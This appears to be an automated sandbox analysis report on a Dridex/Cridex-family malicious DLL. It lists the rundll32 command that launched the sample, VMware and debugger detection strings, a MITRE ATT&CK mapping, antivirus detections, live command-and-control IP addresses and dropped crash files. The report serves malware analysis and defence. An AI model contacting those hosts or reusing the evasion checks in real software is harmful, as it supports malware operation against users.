Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: WerFault.exe, 00000007.00000002.392807664.00000000051CA000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.390922886.00000000051CA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F506D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6F506D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F513138 RtlAddVectoredExceptionHandler,

1_2_6F513138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.738185203.0000000001C60000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352389170.0000000002EA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.350074236.0000000002EA0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.738185203.0000000001C60000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352389170.0000000002EA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.350074236.0000000002EA0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.738185203.0000000001C60000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352389170.0000000002EA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.350074236.0000000002EA0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000001.00000002.738185203.0000000001C60000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352389170.0000000002EA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.350074236.0000000002EA0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6F506D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_6F506D0C

Source: Amcache.hve.7.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	30%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.rundll32.exe.2a90000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.2a90000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.loaddll32.exe.6f500000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.2.rundll32.exe.6f500000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.1580000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6f500000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.2a90000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6f500000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352722173.000000006F51F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544184
Start date:	22.12.2021
Start time:	20:18:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.2% (good quality ratio 93.8%) Quality average: 79.5% Quality standard deviation: 25.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 13.89.179.12 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com Not all processes where analyzed, report is missing behavior information VT rate limit hit for: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
80.211.3.13	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	185.4.135.27
ARUBA-ASNIT	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	80.211.3.13
	Positive_Result_75184731.xls	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	80.211.3.13
HETZNER-ASDE	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_435bf9987f6a7ee95ec1aabecf98fbf5b0b7b2_82810a17_13c89011\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.922046286040136
Encrypted:	false
SSDEEP:	192:kuif0oXD5/HBUZMX4jed+uf/u7sQS274ItWc:xihXD5/BUZMX4jeDf/u7sQX4ItWc
MD5:	528060B5278288935D8E6E6CF8D7AA55
SHA1:	FF1EF30180D490BB6A85C15D68F2B1119475EA94
SHA-256:	C4D626A7AF577A1F8EBCD56B59087B49387B53CBD5A04428F9B6D298F1CF35B4
SHA-512:	723AA4D573412B9810A4150B22E4776C1B986D57AC2671135709ED76EABFC1D94E8A1A1E2AA8BAC2FB31A0E6E53A8AEC1D188A1D562290ABC533D1B57076B0DA
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.6.7.8.2.5.9.7.9.6.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.6.7.9.5.9.1.0.3.3.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.8.d.2.f.6.9.-.4.1.8.2.-.4.e.f.4.-.9.f.9.8.-.c.c.2.4.b.8.2.2.e.b.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.1.f.7.1.5.7.-.7.5.1.3.-.4.3.4.d.-.b.2.2.3.-.0.8.1.c.8.5.0.e.7.7.7.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.8.-.0.0.0.1.-.0.0.1.7.-.e.0.3.e.-.2.4.4.b.b.4.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER55D7.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:19:44 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45716
Entropy (8bit):	2.1093383506020773
Encrypted:	false
SSDEEP:	192:Jw7nbKPGzO5SkbmQvomqJuK1J2Ba/9dU9nEQ:mg5Lbpgmm19/9diL
MD5:	BDCA39B95DCCA06B3BC45BF211957E91
SHA1:	68BC6890AC691D3D2F409C14E2C4460A546FB14B
SHA-256:	0D370B79901BC4C5146EE15791B426EEA3E2F468C0E1EE5033410DB53F1B7794
SHA-512:	8A43057934049A0DF909028404F23115F4C255CF9D0280FF10537733B2E9183F62C0782EE207659E99F276D6C09DB28D17989C268A28B0CC3785FB0042509154
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........a.........................................-..........T.......8...........T...........@...T............................................................................................U...........B...... .......GenuineIntelW...........T..............a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D4A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.693310442719386
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiqf67Og9sTk6Y6z6AgmfT/mS/I4CprX89blssfbXm:RrlsNii6L6Y+6AgmfT/mS9l/fC
MD5:	0A7BC57EF58024A7A991B0B14B694B99
SHA1:	85AF48EF4DFA78D86ADAE9794F4BD40C44E48946
SHA-256:	156B0D27C80F18941CFCE06A2F78C31439DA7BC751E27979B14FF557020C94A1
SHA-512:	01265703B4D0FBF63C46786555DFAB0301789E18692CCEEFE0DE45C9DF453059125B4CCEAFC39820BB452C2347EFF85FCBB87264AF354CD6B2081EB92F65D4AD
Malicious:	false
Reputation:	low
